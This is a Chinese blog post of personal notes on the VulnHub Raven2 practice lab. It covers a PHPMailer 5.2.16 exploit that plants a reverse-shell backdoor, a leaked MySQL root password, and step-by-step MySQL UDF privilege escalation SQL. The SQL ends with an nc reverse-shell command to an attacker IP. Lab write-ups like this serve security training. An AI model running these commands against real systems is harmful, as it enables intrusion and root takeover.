vulnhub之raven2

最新推荐文章于 2024-04-24 10:33:16 发布
最新推荐文章于 2024-04-24 10:33:16 发布
阅读量498 收藏 1
点赞数 1
分类专栏: Vulnhub 文章标签: web安全 安全 服务器 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54431413/article/details/125551267
版权

仅做个人学习笔记使用

目录

一、主机发现

二、端口扫描

三、服务版本探测

四、信息收集

1.一直请求资源

2.常规看源码

五、扫目录

六、phpmailer

七、mysql之udf提权

1.信息收集

2.udf提权

3.步骤

一、主机发现

二、端口扫描

三、服务版本探测

常规22,80端口。

111这是个没看懂

42689 开放了远程进程调用协议

四、信息收集

1.一直请求资源

和原来一样就是请求了国外某些站点资源,导致了无法正常加载,挂个梯子就行。要是用到burp,就挂两层。

就是个保安公司界面

2.常规看源码

看接口,源码泄露,有无隐藏目录,都无。

五、扫目录

最基本信息就是wordpress建站

1. /vendor

3,4,5个文件都提到了PHPMailer,readme是自述文件,里面介绍了phpmailer是个php的邮件传输的类,。而security则提到了他的历史漏洞。changelog讲述变迁日志。

尝试从phpmailer进行突破

(1)flag1

六、phpmailer

因为从上面文件中可以得知版本是5.2.16,所以这几个都去试一下。

1.40974.py

40974.py是可以用的。对目标路径写入反弹shell文件。

注意: 使用前需要先更改文件内容

(1)改回连地址

(2)写入后门文件路径

(3)目标ip

也可以改个文件名

2.访问触发

3.反弹shell

七、mysql之udf提权

当我们信息收集时,发现有泄露的mysql账号密码,

检查进程时,又发现mysql是以root的属主运行的,所以可以利用mysql来提权,

1.信息收集

root     R@v3nSecurity

2.udf提权

udf的设计初衷是为了方便用户自定义一些函数,方便查询一些复杂的数据,同时也增加了使用udf提权的可能。

攻击者通过编写调用cmd或者shell的udf.dll文件,并且导入到一个指定的文件夹目录下,创建一个指向udf.dll的自定义函数,从而在数据库中的查询就等价于在cmd或者shell中执行命令。

3.步骤

(1)找到kali自带的udf提权链接库文件.so

(2)64.so的传到靶机上

最好放到/tmp下

(3)查看插件路径

show variables like '%plugin%';

(4)通过链接库文件写入数据库

使用系统数据库,创建一个表,写入链接库文件数据。

use mysql;

create table a(line blob);

insert into a values(load_file('/tmp/x.so'));

(5)再将链接库文件写入插件位置

select * from a into dumpfile '/usr/lib/mysql/plugin/x.so';

(6)创建新函数

create function sys_exec returns integer soname 'x.so';

 (7)执行反弹shell

select sys_exec('nc 192.168.0.107 6666 -e /bin/bash');

梅_花_七
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶机——RAVEN: 2
qq_44029310的博客
09-12 1949
本文涉及知识点有:靶机环境搭建,dirsearch工具使用,DS_Store信息泄露漏洞,wpscan使用,利用PHPMailer命令执行漏洞获取shell,UDF提权。
Vulnhub系列靶机---Raven2
qq_45953122的博客
10-13 781
用nc开启监听并访问http://192.168.160.47/sky.php 获得一个低级的shell。浏览器访问http://192.168.160.47/contact.php生成后门文件。需要提权,chmod修改权限后,再./LinEnum.sh执行。此时,/usr/bin/find 就具备了SUID 权限。
Raven2掠夺者2》 PC端一键下载+预约注册教程
最新发布
weixin_62825745的博客
04-24 807
不过,网石介绍说,这次的新作不是动作RPG,而是正在开发中的全新大型MMORPG,继承了独特的黑暗奇幻世界观。进入官网后,只需要选择PC端后,输入手机号码,勾选【必填】项,完成上述操作后,点击【预登记】,即可完成登记注册。查看奇游,只需要在奇游上查看《Raven 2掠夺者2》并启用优化,即可让玩家们在游戏过程中稳定游玩。玩家们可以在下载好的游戏启动器中,勾选同意服务协议后,点击【PC版本预约注册】可以进行预约注册。玩家们在奇游中启用优化后,点击详细页面,即可点击一键下载。注意,最好下载到全英文路径中~
【甄选靶场】Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权)
人间体佐菲的博客
09-05 828
【甄选靶场】Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权)
vulnhubRaven2
鲨鱼辣椒的博客
08-05 257
信息搜集 扫描网段发现存活主机 扫描IP地址发现开放端口以及服务 浏览器查看网站
Vulnhub: Raven 2 靶场渗透实战 Walkthrough By V.K.R(上)
weixin_52641450的博客
10-30 769
raven2 靶场 walkthrough by V.K.R
Raven:Javascript框架
05-05
掠夺Raven是一个创造性的编码框架,在Javascript环境中结合了在openFrameworks,Processing和Flash中看到的意识形态。 类按类型分开,因此可以轻松选择项目中需要框架的哪些部分。 虽然仍处于青春期,但正在进行重大...
raven
03-07
通过键入以下命令来git clone https://github.com/icebox827/raven 在终端中运行bundle install 在终端中运行db:create以创建数据库在终端中运行db:migrate以迁移数据库rails s 开始添加用户并创建事件现场演示技术...
raven-for-redux:用于Redux的Raven中间件
02-05
Sentry现在建议使用其新的SDK @sentry/browser而不是Raven。 请查看 ,以获取支持新SDK的该库的API兼容分支! 用于Redux的Raven中间件 注意:需要Raven> = 3.9.0。 Raven 3.14.0有此库触发 将每个调度动作的类型记录...
Raven
10-25
Raven
Rraven:将R与Raven集成
04-28
拉文 Rraven软件包旨在促进R和()之间的数据交换。 提供了非常强大的工具来分析(动物)声音。 R可以简化复杂分析程序的自动化过程。 此外,R包(如 , 和 (以及其他))提供了其他分析方法,可作为发现的软件包...
Raven: 2靶机入侵
weixin_30477797的博客
01-30 959
0x00 前言 Raven 2是一个中等难度的boot2root虚拟靶机。有四个flag需要找出。在多次被攻破后,Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵。 靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova 0x01 存活主机 1.在windows上的scan ports工具对目标整个网段(...
vulnhub-Raven2
LuckySec
12-03 790
0x01 靶场简介 Raven 2是中级boot2root VM, 有4个flag需要搜集,在多次被攻破后,Raven Security 采取了额外的措施来加固其Web服务器,以防止黑客入侵。您是否仍然可以攻破Raven? 靶场下载:https://download.vulnhub.com/raven/Raven2.ova 0x02 靶场渗透 1. flag1 使用Nmap探测靶机IP地址 nmap -sP 192.168.126.0/24 确定IP地址后,扫描开放的端口和服务 Nmap -p 1-65
VulnHub】Raven: 2靶机的渗透测试
大方子
06-28 4034
总结和思考: 使用netdiscover探测内网存活主机 PHPMailer的漏洞反弹得到shell Python版的EXP修改 查看wordpress的wp-config.php配置文件得到数据库账号密码 MySQL版本 <= 7.14 5.6.32 5.5.51 可以利用UDF提权 KALI对EXP的编译 给程序chmod u+s 增加suid权限,可以以root权限运...
No.3-VulnHub-Raven: 2-Walkthrough渗透学习
qq_34801745的博客
12-29 1996
** VulnHub-Raven: 2-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 靶机难度:中等(CTF) 靶机发布日期:2018年5月4日 靶机描述:Raven:2是中级boot2root VM。有四个要捕获的标志。在多次破坏之后,Raven Security采取了额外的措施来加固其Web服务器,以防止黑...
vulnhub raven2
mrwangtw的博客
03-15 3653
nmap主机发现 端口扫描 进入80端口,gobuster扫描 进入vendor目录 搜集信息,得到 搜索相关的漏洞 使用这个payload,更改配置信息 直接运行即可,然后访问contact页面即可在服务器上生成exp的php文件,然后主机开启监听4444端口,访问exp页面即可得到shell 查看配置信息 登录mysql,这里没有思路,看大佬的博客发现可以直接搜索mysql的漏洞 使用的是CVE-2016-6662的漏洞 这...
【渗透测试】VulnHub-Raven: 2
m0_52923241的博客
11-02 3122
VulnHub-Raven: 2VulnHub-Raven: 2渗透详细思路小知识点常用工具篇 VulnHub-Raven: 2渗透详细思路 VulnHub-Raven: 2渗透详细思路 nmap找目标ip地址,扫可以试用的开放端口和服务(22、80、111) dirb进行目录的爆破扫描 找漏洞,发现PHPMailer 邮件服务 searchsploit查看漏洞利用点,下载到本地,修改参数并运行 小知识点 常用工具篇 ...
vulnhub靶场,Raven2
kukudeshuo的博客
07-19 1308
vulnhub靶场,Raven2 环境准备 攻击机:kali(192.168.58.130) 靶机:Raven2(192.168.58.157) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80、111、56784 浏览器访问目标靶机80端口 就是一个非常普通的页面,没有啥好利用的 网站目录结构扫描 dirb http://19
VulnHub-Raven:2靶机渗透
ce666666的博客
02-04 3819
前言 通过VulnHub-Raven:2靶机渗透学习 攻击机:kali 靶机:Raven 网段:192.168.123.0/24 知识点: PHPMailer 小于5.2.18 (CVE-2016-10033) UDF提权 工具: LinEnum——Linux枚举漏洞工具 dirsearch——目录扫描工具 CVE-2016-10033 原理:PHPMailer mail()函数功能,远程攻击者利用默认开启的PHPMailer可以运行构造的恶意代码,无需登录触发该漏洞,从而导致获取系统权限。
vulnhub靶机——raven: 2
09-03
- *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅_花_七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值